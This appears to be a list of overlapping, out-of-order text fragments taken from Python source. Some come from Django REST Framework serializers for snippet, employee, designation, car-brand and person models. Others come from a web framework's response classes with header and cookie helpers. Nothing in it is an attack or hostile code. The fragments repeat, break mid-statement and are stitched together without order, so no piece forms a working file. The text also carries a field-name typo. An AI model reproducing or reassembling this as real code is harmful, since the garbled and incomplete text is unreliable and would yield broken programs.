"a new Snippet''' return Snippet.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and return",
"return a new Snippet''' return Snippet.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and",
"instance.language) instance.style = validate_data.get('style', instance.style) instance.save() return instance # SnippetSerializer using 'ModelSerializer' class",
"= serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def create(self, validate_data): '''create and return a new Snippet''' return",
"'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer): class Meta: model = Snippet fields = \"__all__\" # creating",
"rest_framework import serializers from .models import CarBrands, EmployeeDesignations, Employees, Snippet, LANGUAGE_CHOICES, STYLE_CHOICES, Persons,",
"snippet''' instance.title = validate_data.get('title', instance.title) instance.code = validate_data.get('code', instance.code) instance.linenos = validate_data.get('linenos', instance.linenos)",
"creating serializer for list of all the names of employee in Employees Model",
"'this employee name should contain Mr or Mrs') return value class Meta: model",
"model # SnippetSerializer using 'serializers' class SnippetSerializerA(serializers.Serializer): id = serializers.IntegerField(read_only=True) title = serializers.CharField(max_length=100)",
"creating a serialzer for getting details of all the employees class EmpDetailSerializer(serializers.ModelSerializer): def",
"= CarBrands fields = '__all__' # creating serializer for list of all the",
"# validation for employee_name field that it should contain mr or mrs def",
"def validate_employee_name(self, value): a = \"mr\" if a not in value.lower(): raise serializers.ValidationError(",
"serializer for Roles Model class CarBrandsSerializer(serializers.ModelSerializer): class Meta: model = CarBrands fields =",
"class Meta: model = Employees fields = [\"employee_name\"] # creating a serialzer for",
"value): if len(value) != 10: raise serializers.ValidationError( \" contact should contain 10 digits",
"fields = \"__all__\" # creating a serializer for Roles Model class CarBrandsSerializer(serializers.ModelSerializer): class",
"return instance # ------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer): opentasks = serializers.SerializerMethodField(\"open_task\") def open_task(self, user): return",
"# creating a serialzer for getting details of all the employees class EmpDetailSerializer(serializers.ModelSerializer):",
"# creating serializer for list of all the names of employee in Employees",
"all the names of employee in Employees Model class EmployeeNameSerializer(serializers.ModelSerializer): class Meta: model",
"serialzer for getting details of all the employees class EmpDetailSerializer(serializers.ModelSerializer): def length(self, value):",
"Snippet''' return EmployeeDesignations.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and return an existing",
"class Meta: model = CarBrands fields = '__all__' # creating serializer for list",
"a serializer for Roles Model class CarBrandsSerializer(serializers.ModelSerializer): class Meta: model = CarBrands fields",
"serializers from .models import CarBrands, EmployeeDesignations, Employees, Snippet, LANGUAGE_CHOICES, STYLE_CHOICES, Persons, PersonTasks #",
"10 digits only\") designations = serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True) employee_name = serializers.CharField(max_length=50) contact =",
"contact = serializers.CharField(validators=[length]) # validation for employee_name field that it should contain mr",
"a = \"mr\" if a not in value.lower(): raise serializers.ValidationError( 'this employee name",
"that can be easily rendered into JSON,XML''' from rest_framework import serializers from .models",
"serializer for list of all the names of employee in Employees Model class",
"linenos = serializers.BooleanField(required=False) language = serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python') style = serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def",
"default='friendly') def create(self, validate_data): '''create and return a new Snippet''' return Snippet.objects.create(**validate_data) def",
"Mr or Mrs') return value class Meta: model = Employees fields = \"__all__\"",
"serializers.CharField(max_length=100) code = serializers.CharField(style={'base_template': 'textarea.html'}) linenos = serializers.BooleanField(required=False) language = serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python')",
"# SnippetSerializer using 'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer): class Meta: model = Snippet fields =",
"return a new Snippet''' return EmployeeDesignations.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and",
"class Meta: model = Snippet fields = \"__all__\" # creating a serializer for",
"serializers.ValidationError( 'this employee name should contain Mr or Mrs') return value class Meta:",
"import CarBrands, EmployeeDesignations, Employees, Snippet, LANGUAGE_CHOICES, STYLE_CHOICES, Persons, PersonTasks # creating a serializer",
"Employees Model class EmployeeNameSerializer(serializers.ModelSerializer): class Meta: model = Employees fields = [\"employee_name\"] #",
"Snippet model # SnippetSerializer using 'serializers' class SnippetSerializerA(serializers.Serializer): id = serializers.IntegerField(read_only=True) title =",
"serializer for Snippet model # SnippetSerializer using 'serializers' class SnippetSerializerA(serializers.Serializer): id = serializers.IntegerField(read_only=True)",
"'''create and return a new Snippet''' return EmployeeDesignations.objects.create(**validate_data) def update(self, instance, validate_data): '''",
"a new Snippet''' return EmployeeDesignations.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and return",
"instance # SnippetSerializer using 'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer): class Meta: model = Snippet fields",
"class PersonSerializer(serializers.ModelSerializer): opentasks = serializers.SerializerMethodField(\"open_task\") def open_task(self, user): return len(user.tasks.filter(status=1)) class Meta: model",
"of all the employees class EmpDetailSerializer(serializers.ModelSerializer): def length(self, value): if len(value) != 10:",
"= serializers.BooleanField(required=False) language = serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python') style = serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def create(self,",
"details of all the employees class EmpDetailSerializer(serializers.ModelSerializer): def length(self, value): if len(value) !=",
"instance.save() return instance # SnippetSerializer using 'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer): class Meta: model =",
"class CarBrandsSerializer(serializers.ModelSerializer): class Meta: model = CarBrands fields = '__all__' # creating serializer",
"mrs def validate_employee_name(self, value): a = \"mr\" if a not in value.lower(): raise",
"\"mr\" if a not in value.lower(): raise serializers.ValidationError( 'this employee name should contain",
"field that it should contain mr or mrs def validate_employee_name(self, value): a =",
"LANGUAGE_CHOICES, STYLE_CHOICES, Persons, PersonTasks # creating a serializer for Snippet model # SnippetSerializer",
"instance.designation_name = validate_data.get( 'designaion_name', instance.designation_name) instance.save() return instance # ------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer): opentasks",
"Mrs') return value class Meta: model = Employees fields = \"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer):",
"SnippetSerializerA(serializers.Serializer): id = serializers.IntegerField(read_only=True) title = serializers.CharField(max_length=100) code = serializers.CharField(style={'base_template': 'textarea.html'}) linenos =",
"instance.style = validate_data.get('style', instance.style) instance.save() return instance # SnippetSerializer using 'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer):",
"class SnippetSerializerA(serializers.Serializer): id = serializers.IntegerField(read_only=True) title = serializers.CharField(max_length=100) code = serializers.CharField(style={'base_template': 'textarea.html'}) linenos",
"python datatypes that can be easily rendered into JSON,XML''' from rest_framework import serializers",
"a native python datatypes that can be easily rendered into JSON,XML''' from rest_framework",
"Snippet fields = \"__all__\" # creating a serializer for Roles Model class CarBrandsSerializer(serializers.ModelSerializer):",
"code = serializers.CharField(style={'base_template': 'textarea.html'}) linenos = serializers.BooleanField(required=False) language = serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python') style",
"the employees class EmpDetailSerializer(serializers.ModelSerializer): def length(self, value): if len(value) != 10: raise serializers.ValidationError(",
"of employee in Employees Model class EmployeeNameSerializer(serializers.ModelSerializer): class Meta: model = Employees fields",
"objects can be converted into a native python datatypes that can be easily",
"serializer for the models so that state of model objects can be converted",
"# creating a serializer for Snippet model # SnippetSerializer using 'serializers' class SnippetSerializerA(serializers.Serializer):",
"def length(self, value): if len(value) != 10: raise serializers.ValidationError( \" contact should contain",
"instance.title) instance.code = validate_data.get('code', instance.code) instance.linenos = validate_data.get('linenos', instance.linenos) instance.language = validate_data.get('language', instance.language)",
"return an existing snippet''' instance.title = validate_data.get('title', instance.title) instance.code = validate_data.get('code', instance.code) instance.linenos",
"serializers.CharField( required=True, allow_blank=False, max_length=100) def create(self, validate_data): '''create and return a new Snippet'''",
"from rest_framework import serializers from .models import CarBrands, EmployeeDesignations, Employees, Snippet, LANGUAGE_CHOICES, STYLE_CHOICES,",
"instance.linenos) instance.language = validate_data.get('language', instance.language) instance.style = validate_data.get('style', instance.style) instance.save() return instance #",
"employee_name = serializers.CharField(max_length=50) contact = serializers.CharField(validators=[length]) # validation for employee_name field that it",
"existing snippet''' instance.title = validate_data.get('title', instance.title) instance.code = validate_data.get('code', instance.code) instance.linenos = validate_data.get('linenos',",
"class EmployeeDesignationsSerializer(serializers.Serializer): designation_name = serializers.CharField( required=True, allow_blank=False, max_length=100) def create(self, validate_data): '''create and",
"= [\"employee_name\"] # creating a serialzer for getting details of all the employees",
"'serializers' class SnippetSerializerA(serializers.Serializer): id = serializers.IntegerField(read_only=True) title = serializers.CharField(max_length=100) code = serializers.CharField(style={'base_template': 'textarea.html'})",
"= serializers.CharField(max_length=50) contact = serializers.CharField(validators=[length]) # validation for employee_name field that it should",
"validate_data): '''create and return a new Snippet''' return EmployeeDesignations.objects.create(**validate_data) def update(self, instance, validate_data):",
"employee in Employees Model class EmployeeNameSerializer(serializers.ModelSerializer): class Meta: model = Employees fields =",
"class SnippetSerializerB(serializers.ModelSerializer): class Meta: model = Snippet fields = \"__all__\" # creating a",
"serializers.IntegerField(read_only=True) title = serializers.CharField(max_length=100) code = serializers.CharField(style={'base_template': 'textarea.html'}) linenos = serializers.BooleanField(required=False) language =",
"Employees fields = [\"employee_name\"] # creating a serialzer for getting details of all",
"or Mrs') return value class Meta: model = Employees fields = \"__all__\" class",
"contain mr or mrs def validate_employee_name(self, value): a = \"mr\" if a not",
"names of employee in Employees Model class EmployeeNameSerializer(serializers.ModelSerializer): class Meta: model = Employees",
"should contain mr or mrs def validate_employee_name(self, value): a = \"mr\" if a",
"and return an existing snippet''' instance.title = validate_data.get('title', instance.title) instance.code = validate_data.get('code', instance.code)",
"new Snippet''' return EmployeeDesignations.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and return an",
"serializers.CharField(validators=[length]) # validation for employee_name field that it should contain mr or mrs",
"# ------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer): opentasks = serializers.SerializerMethodField(\"open_task\") def open_task(self, user): return len(user.tasks.filter(status=1)) class",
"serializers.SerializerMethodField(\"open_task\") def open_task(self, user): return len(user.tasks.filter(status=1)) class Meta: model = Persons fields =",
"not in value.lower(): raise serializers.ValidationError( 'this employee name should contain Mr or Mrs')",
"creating a serializer for Roles Model class CarBrandsSerializer(serializers.ModelSerializer): class Meta: model = CarBrands",
"list of all the names of employee in Employees Model class EmployeeNameSerializer(serializers.ModelSerializer): class",
"that it should contain mr or mrs def validate_employee_name(self, value): a = \"mr\"",
"required=True, allow_blank=False, max_length=100) def create(self, validate_data): '''create and return a new Snippet''' return",
"validate_data): ''' Update and return an existing snippet''' instance.title = validate_data.get('title', instance.title) instance.code",
"PersonSerializer(serializers.ModelSerializer): opentasks = serializers.SerializerMethodField(\"open_task\") def open_task(self, user): return len(user.tasks.filter(status=1)) class Meta: model =",
"''' Update and return an existing snippet''' instance.designation_name = validate_data.get( 'designaion_name', instance.designation_name) instance.save()",
"Employees fields = \"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer): designation_name = serializers.CharField( required=True, allow_blank=False, max_length=100) def",
"= Snippet fields = \"__all__\" # creating a serializer for Roles Model class",
"return EmployeeDesignations.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and return an existing snippet'''",
"= serializers.SerializerMethodField(\"open_task\") def open_task(self, user): return len(user.tasks.filter(status=1)) class Meta: model = Persons fields",
"for the models so that state of model objects can be converted into",
"EmployeeDesignations, Employees, Snippet, LANGUAGE_CHOICES, STYLE_CHOICES, Persons, PersonTasks # creating a serializer for Snippet",
"serializers.CharField(style={'base_template': 'textarea.html'}) linenos = serializers.BooleanField(required=False) language = serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python') style = serializers.ChoiceField(choices=STYLE_CHOICES,",
"that state of model objects can be converted into a native python datatypes",
"return Snippet.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and return an existing snippet'''",
"EmployeeNameSerializer(serializers.ModelSerializer): class Meta: model = Employees fields = [\"employee_name\"] # creating a serialzer",
"model = Employees fields = \"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer): designation_name = serializers.CharField( required=True, allow_blank=False,",
"CarBrandsSerializer(serializers.ModelSerializer): class Meta: model = CarBrands fields = '__all__' # creating serializer for",
"EmployeeDesignations.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and return an existing snippet''' instance.designation_name",
"Update and return an existing snippet''' instance.title = validate_data.get('title', instance.title) instance.code = validate_data.get('code',",
"Employees, Snippet, LANGUAGE_CHOICES, STYLE_CHOICES, Persons, PersonTasks # creating a serializer for Snippet model",
"instance # ------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer): opentasks = serializers.SerializerMethodField(\"open_task\") def open_task(self, user): return len(user.tasks.filter(status=1))",
"model = Snippet fields = \"__all__\" # creating a serializer for Roles Model",
"mr or mrs def validate_employee_name(self, value): a = \"mr\" if a not in",
"and return a new Snippet''' return EmployeeDesignations.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update",
"rendered into JSON,XML''' from rest_framework import serializers from .models import CarBrands, EmployeeDesignations, Employees,",
"employee name should contain Mr or Mrs') return value class Meta: model =",
"value.lower(): raise serializers.ValidationError( 'this employee name should contain Mr or Mrs') return value",
"should contain 10 digits only\") designations = serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True) employee_name = serializers.CharField(max_length=50)",
"------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer): opentasks = serializers.SerializerMethodField(\"open_task\") def open_task(self, user): return len(user.tasks.filter(status=1)) class Meta:",
"instance.linenos = validate_data.get('linenos', instance.linenos) instance.language = validate_data.get('language', instance.language) instance.style = validate_data.get('style', instance.style) instance.save()",
"instance.title = validate_data.get('title', instance.title) instance.code = validate_data.get('code', instance.code) instance.linenos = validate_data.get('linenos', instance.linenos) instance.language",
"serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def create(self, validate_data): '''create and return a new Snippet''' return Snippet.objects.create(**validate_data)",
"contain 10 digits only\") designations = serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True) employee_name = serializers.CharField(max_length=50) contact",
"into a native python datatypes that can be easily rendered into JSON,XML''' from",
"id = serializers.IntegerField(read_only=True) title = serializers.CharField(max_length=100) code = serializers.CharField(style={'base_template': 'textarea.html'}) linenos = serializers.BooleanField(required=False)",
"'''writing a serializer for the models so that state of model objects can",
"of model objects can be converted into a native python datatypes that can",
"= validate_data.get('language', instance.language) instance.style = validate_data.get('style', instance.style) instance.save() return instance # SnippetSerializer using",
"opentasks = serializers.SerializerMethodField(\"open_task\") def open_task(self, user): return len(user.tasks.filter(status=1)) class Meta: model = Persons",
"serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python') style = serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def create(self, validate_data): '''create and return",
"creating a serializer for Snippet model # SnippetSerializer using 'serializers' class SnippetSerializerA(serializers.Serializer): id",
"instance.language = validate_data.get('language', instance.language) instance.style = validate_data.get('style', instance.style) instance.save() return instance # SnippetSerializer",
"read_only=True) employee_name = serializers.CharField(max_length=50) contact = serializers.CharField(validators=[length]) # validation for employee_name field that",
"the names of employee in Employees Model class EmployeeNameSerializer(serializers.ModelSerializer): class Meta: model =",
"if a not in value.lower(): raise serializers.ValidationError( 'this employee name should contain Mr",
"fields = [\"employee_name\"] # creating a serialzer for getting details of all the",
"= Employees fields = [\"employee_name\"] # creating a serialzer for getting details of",
"state of model objects can be converted into a native python datatypes that",
"employee_name field that it should contain mr or mrs def validate_employee_name(self, value): a",
"''' Update and return an existing snippet''' instance.title = validate_data.get('title', instance.title) instance.code =",
"Persons, PersonTasks # creating a serializer for Snippet model # SnippetSerializer using 'serializers'",
".models import CarBrands, EmployeeDesignations, Employees, Snippet, LANGUAGE_CHOICES, STYLE_CHOICES, Persons, PersonTasks # creating a",
"can be easily rendered into JSON,XML''' from rest_framework import serializers from .models import",
"only\") designations = serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True) employee_name = serializers.CharField(max_length=50) contact = serializers.CharField(validators=[length]) #",
"PersonTasks # creating a serializer for Snippet model # SnippetSerializer using 'serializers' class",
"create(self, validate_data): '''create and return a new Snippet''' return Snippet.objects.create(**validate_data) def update(self, instance,",
"easily rendered into JSON,XML''' from rest_framework import serializers from .models import CarBrands, EmployeeDesignations,",
"\"__all__\" # creating a serializer for Roles Model class CarBrandsSerializer(serializers.ModelSerializer): class Meta: model",
"in Employees Model class EmployeeNameSerializer(serializers.ModelSerializer): class Meta: model = Employees fields = [\"employee_name\"]",
"datatypes that can be easily rendered into JSON,XML''' from rest_framework import serializers from",
"fields = '__all__' # creating serializer for list of all the names of",
"\" contact should contain 10 digits only\") designations = serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True) employee_name",
"def open_task(self, user): return len(user.tasks.filter(status=1)) class Meta: model = Persons fields = \"__all__\"",
"10: raise serializers.ValidationError( \" contact should contain 10 digits only\") designations = serializers.SlugRelatedField(",
"= serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True) employee_name = serializers.CharField(max_length=50) contact = serializers.CharField(validators=[length]) # validation for",
"validate_data.get('code', instance.code) instance.linenos = validate_data.get('linenos', instance.linenos) instance.language = validate_data.get('language', instance.language) instance.style = validate_data.get('style',",
"EmpDetailSerializer(serializers.ModelSerializer): def length(self, value): if len(value) != 10: raise serializers.ValidationError( \" contact should",
"fields = \"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer): designation_name = serializers.CharField( required=True, allow_blank=False, max_length=100) def create(self,",
"Snippet''' return Snippet.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and return an existing",
"from .models import CarBrands, EmployeeDesignations, Employees, Snippet, LANGUAGE_CHOICES, STYLE_CHOICES, Persons, PersonTasks # creating",
"a serialzer for getting details of all the employees class EmpDetailSerializer(serializers.ModelSerializer): def length(self,",
"return an existing snippet''' instance.designation_name = validate_data.get( 'designaion_name', instance.designation_name) instance.save() return instance #",
"instance, validate_data): ''' Update and return an existing snippet''' instance.title = validate_data.get('title', instance.title)",
"validate_data): ''' Update and return an existing snippet''' instance.designation_name = validate_data.get( 'designaion_name', instance.designation_name)",
"= serializers.ChoiceField( choices=LANGUAGE_CHOICES, default='python') style = serializers.ChoiceField(choices=STYLE_CHOICES, default='friendly') def create(self, validate_data): '''create and",
"instance.designation_name) instance.save() return instance # ------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer): opentasks = serializers.SerializerMethodField(\"open_task\") def open_task(self,",
"CarBrands fields = '__all__' # creating serializer for list of all the names",
"for list of all the names of employee in Employees Model class EmployeeNameSerializer(serializers.ModelSerializer):",
"JSON,XML''' from rest_framework import serializers from .models import CarBrands, EmployeeDesignations, Employees, Snippet, LANGUAGE_CHOICES,",
"name should contain Mr or Mrs') return value class Meta: model = Employees",
"Meta: model = Employees fields = [\"employee_name\"] # creating a serialzer for getting",
"Model class CarBrandsSerializer(serializers.ModelSerializer): class Meta: model = CarBrands fields = '__all__' # creating",
"it should contain mr or mrs def validate_employee_name(self, value): a = \"mr\" if",
"and return an existing snippet''' instance.designation_name = validate_data.get( 'designaion_name', instance.designation_name) instance.save() return instance",
"'designaion_name', instance.designation_name) instance.save() return instance # ------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer): opentasks = serializers.SerializerMethodField(\"open_task\") def",
"employees class EmpDetailSerializer(serializers.ModelSerializer): def length(self, value): if len(value) != 10: raise serializers.ValidationError( \"",
"new Snippet''' return Snippet.objects.create(**validate_data) def update(self, instance, validate_data): ''' Update and return an",
"\"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer): designation_name = serializers.CharField( required=True, allow_blank=False, max_length=100) def create(self, validate_data): '''create",
"for employee_name field that it should contain mr or mrs def validate_employee_name(self, value):",
"an existing snippet''' instance.designation_name = validate_data.get( 'designaion_name', instance.designation_name) instance.save() return instance # ------------------------------------------------------------------------------------------------------------------------------------------------",
"validate_data.get( 'designaion_name', instance.designation_name) instance.save() return instance # ------------------------------------------------------------------------------------------------------------------------------------------------ class PersonSerializer(serializers.ModelSerializer): opentasks = serializers.SerializerMethodField(\"open_task\")",
"return value class Meta: model = Employees fields = \"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer): designation_name",
"the models so that state of model objects can be converted into a",
"contact should contain 10 digits only\") designations = serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True) employee_name =",
"= validate_data.get('title', instance.title) instance.code = validate_data.get('code', instance.code) instance.linenos = validate_data.get('linenos', instance.linenos) instance.language =",
"validate_data.get('style', instance.style) instance.save() return instance # SnippetSerializer using 'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer): class Meta:",
"def update(self, instance, validate_data): ''' Update and return an existing snippet''' instance.title =",
"digits only\") designations = serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True) employee_name = serializers.CharField(max_length=50) contact = serializers.CharField(validators=[length])",
"Meta: model = Employees fields = \"__all__\" class EmployeeDesignationsSerializer(serializers.Serializer): designation_name = serializers.CharField( required=True,",
"of all the names of employee in Employees Model class EmployeeNameSerializer(serializers.ModelSerializer): class Meta:",
"existing snippet''' instance.designation_name = validate_data.get( 'designaion_name', instance.designation_name) instance.save() return instance # ------------------------------------------------------------------------------------------------------------------------------------------------ class",
"!= 10: raise serializers.ValidationError( \" contact should contain 10 digits only\") designations =",
"= serializers.IntegerField(read_only=True) title = serializers.CharField(max_length=100) code = serializers.CharField(style={'base_template': 'textarea.html'}) linenos = serializers.BooleanField(required=False) language",
"allow_blank=False, max_length=100) def create(self, validate_data): '''create and return a new Snippet''' return EmployeeDesignations.objects.create(**validate_data)",
"contain Mr or Mrs') return value class Meta: model = Employees fields =",
"instance, validate_data): ''' Update and return an existing snippet''' instance.designation_name = validate_data.get( 'designaion_name',",
"SnippetSerializerB(serializers.ModelSerializer): class Meta: model = Snippet fields = \"__all__\" # creating a serializer",
"designations = serializers.SlugRelatedField( slug_field=\"designation_name\", read_only=True) employee_name = serializers.CharField(max_length=50) contact = serializers.CharField(validators=[length]) # validation",
"validate_data.get('linenos', instance.linenos) instance.language = validate_data.get('language', instance.language) instance.style = validate_data.get('style', instance.style) instance.save() return instance",
"be easily rendered into JSON,XML''' from rest_framework import serializers from .models import CarBrands,",
"using 'ModelSerializer' class SnippetSerializerB(serializers.ModelSerializer): class Meta: model = Snippet fields = \"__all__\" #",
"SnippetSerializer using 'serializers' class SnippetSerializerA(serializers.Serializer): id = serializers.IntegerField(read_only=True) title = serializers.CharField(max_length=100) code ="
] |
[
"header=None, body=None, content_type=\"text/plain\", ): if not isinstance(status_code, int): raise TypeError(\"status_code must be int",
"self._body = body if body is not None else bytes() @property def status_code(self):",
"str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if isinstance(body, str) else None, content_type=\"text/plain\" )",
"text/plain \"\"\" def __init__( self, status_code=200, header=None, body=None, content_type=\"text/plain\", ): if not isinstance(status_code,",
"header(self): raise NotImplementedError( \"_Response must have header attr\" ) @property def header_len(self): raise",
"body(self): raise NotImplementedError( \"_Response must have body attr\" ) @property def content_type(self): raise",
"body if body is not None else bytes() @property def status_code(self): return self._status_code",
"self, name, value, **kwards ): hdr_elem = dict() hdr_elem[\"name\"] = \"Set-Cookie\" value =",
"isinstance(body, str): raise TypeError(\"body must be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if",
"): if body is not None and not isinstance(body, dict) and \\ not",
"body.encode(\"utf-8\") if body is not None else None, content_type=\"text/html\" ) class JSONResponse(Response): def",
"body.encode(\"utf-8\") if isinstance(body, str) else None, content_type=\"text/plain\" ) class HTMLResponse(Response): def __init__( self,",
"have 5 attributes. - status_code: default 200 - header: default: [] - body:",
") class JSONResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body is",
"have header attr\" ) @property def body(self): raise NotImplementedError( \"_Response must have body",
"len(self._header) @property def body(self): return self._body @property def content_type(self): return self._content_type def add_header(self,",
"hdr_elem[\"name\"] = \"Set-Cookie\" value = header_value_from_cookie(name, value, **kwards) hdr_elem[\"value\"] = value self._header.append(hdr_elem) class",
"if not isinstance(status_code, int): raise TypeError(\"status_code must be int type.\") if header is",
"@property def header_len(self): raise NotImplementedError( \"_Response must have header attr\" ) @property def",
"is not None else bytes() @property def status_code(self): return self._status_code @property def header(self):",
"must have 5 attributes. - status_code: default 200 - header: default: [] -",
"\\ if body is not None and len(body) > 0 \\ else None,",
"import _fly_response import json from .cookie import * from .exceptions import * class",
"status_code(self): raise NotImplementedError( \"_Response must have status_code attr\" ) @property def header(self): raise",
"type.\") self._status_code = status_code self._content_type = content_type self._header = list() self._body = body",
"json.dumps(body).encode(\"utf-8\") \\ if body is not None and len(body) > 0 \\ else",
"raise NotImplementedError( \"_Response must have header attr\" ) @property def header_len(self): raise NotImplementedError(",
"Response(_Response): \"\"\" All Response subclass must have 5 attributes. - status_code: default 200",
"is not None else None, content_type=\"text/html\" ) class JSONResponse(Response): def __init__( self, status_code=200,",
"isinstance(header, (list)): raise TypeError(\"status_code must be list type.\") if not isinstance(content_type, str): raise",
"NotImplementedError( \"_Response must have body attr\" ) @property def content_type(self): raise NotImplementedError( \"_Response",
"def header(self): raise NotImplementedError( \"_Response must have header attr\" ) @property def header_len(self):",
"raise TypeError(\"body must be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if isinstance(body, str)",
"if body is not None and len(body) > 0 \\ else None, content_type=\"application/json\"",
"200 - header: default: [] - body: default: bytes() - content_type: default: text/plain",
"is not None and not isinstance(body, str): raise TypeError(\"body must be str type.\")",
"str): raise TypeError(\"content_type must be str type.\") if body is not None and",
"have header attr\" ) @property def header_len(self): raise NotImplementedError( \"_Response must have header",
"class Response(_Response): \"\"\" All Response subclass must have 5 attributes. - status_code: default",
"if body is not None else bytes() @property def status_code(self): return self._status_code @property",
"header_len(self): raise NotImplementedError( \"_Response must have header attr\" ) @property def body(self): raise",
"\"\"\" All Response subclass must have 5 attributes. - status_code: default 200 -",
"must have header attr\" ) @property def body(self): raise NotImplementedError( \"_Response must have",
"\"_Response must have status_code attr\" ) @property def header(self): raise NotImplementedError( \"_Response must",
"super().__init__( status_code, header, body.encode(\"utf-8\") if isinstance(body, str) else None, content_type=\"text/plain\" ) class HTMLResponse(Response):",
") @property def header_len(self): raise NotImplementedError( \"_Response must have header attr\" ) @property",
"return self._body @property def content_type(self): return self._content_type def add_header(self, name, value): hdr_elem =",
"@property def content_type(self): raise NotImplementedError( \"_Response must have content_type attr\" ) class Response(_Response):",
"header=None, body=None, ): if body is not None and not isinstance(body, dict) and",
"not None and not isinstance(body, (bytes)): raise TypeError(\"body must be bytes type.\") self._status_code",
"raise TypeError(\"body must be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if body is",
"content_type=\"text/plain\", ): if not isinstance(status_code, int): raise TypeError(\"status_code must be int type.\") if",
"): hdr_elem = dict() hdr_elem[\"name\"] = \"Set-Cookie\" value = header_value_from_cookie(name, value, **kwards) hdr_elem[\"value\"]",
"value self._header.append(hdr_elem) class PlainResponse(Response): def __init__( self, status_code=200, header=None, body=None, ): if body",
"not None else bytes() @property def status_code(self): return self._status_code @property def header(self): return",
"be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\") if body is not None else",
"from .cookie import * from .exceptions import * class _Response(_fly_response): @property def status_code(self):",
"hdr_elem = dict() hdr_elem[\"name\"] = \"Set-Cookie\" value = header_value_from_cookie(name, value, **kwards) hdr_elem[\"value\"] =",
"bytes type.\") self._status_code = status_code self._content_type = content_type self._header = list() self._body =",
"not isinstance(body, str): raise TypeError(\"body must be str type.\") super().__init__( status_code, header, body.encode(\"utf-8\")",
"def status_code(self): raise NotImplementedError( \"_Response must have status_code attr\" ) @property def header(self):",
"NotImplementedError( \"_Response must have status_code attr\" ) @property def header(self): raise NotImplementedError( \"_Response",
"if body is not None and not isinstance(body, str): raise TypeError(\"body must be",
"* from .exceptions import * class _Response(_fly_response): @property def status_code(self): raise NotImplementedError( \"_Response",
"header, body.encode(\"utf-8\") if isinstance(body, str) else None, content_type=\"text/plain\" ) class HTMLResponse(Response): def __init__(",
"must be list type.\") if not isinstance(content_type, str): raise TypeError(\"content_type must be str",
"attr\" ) class Response(_Response): \"\"\" All Response subclass must have 5 attributes. -",
"import json from .cookie import * from .exceptions import * class _Response(_fly_response): @property",
"def status_code(self): return self._status_code @property def header(self): return self._header @property def header_len(self): return",
"status_code: default 200 - header: default: [] - body: default: bytes() - content_type:",
"TypeError(\"status_code must be int type.\") if header is not None and not isinstance(header,",
"self, status_code=200, header=None, body=None, content_type=\"text/plain\", ): if not isinstance(status_code, int): raise TypeError(\"status_code must",
"def body(self): raise NotImplementedError( \"_Response must have body attr\" ) @property def content_type(self):",
"\"_Response must have content_type attr\" ) class Response(_Response): \"\"\" All Response subclass must",
"is not None and not isinstance(header, (list)): raise TypeError(\"status_code must be list type.\")",
"value): hdr_elem = dict() hdr_elem[\"name\"] = name hdr_elem[\"value\"] = value self._header.append(hdr_elem) def set_cookie(",
"None and not isinstance(body, (bytes)): raise TypeError(\"body must be bytes type.\") self._status_code =",
"@property def header(self): raise NotImplementedError( \"_Response must have header attr\" ) @property def",
"set_cookie( self, name, value, **kwards ): hdr_elem = dict() hdr_elem[\"name\"] = \"Set-Cookie\" value",
"must be bytes type.\") self._status_code = status_code self._content_type = content_type self._header = list()",
"name, value): hdr_elem = dict() hdr_elem[\"name\"] = name hdr_elem[\"value\"] = value self._header.append(hdr_elem) def",
"int type.\") if header is not None and not isinstance(header, (list)): raise TypeError(\"status_code",
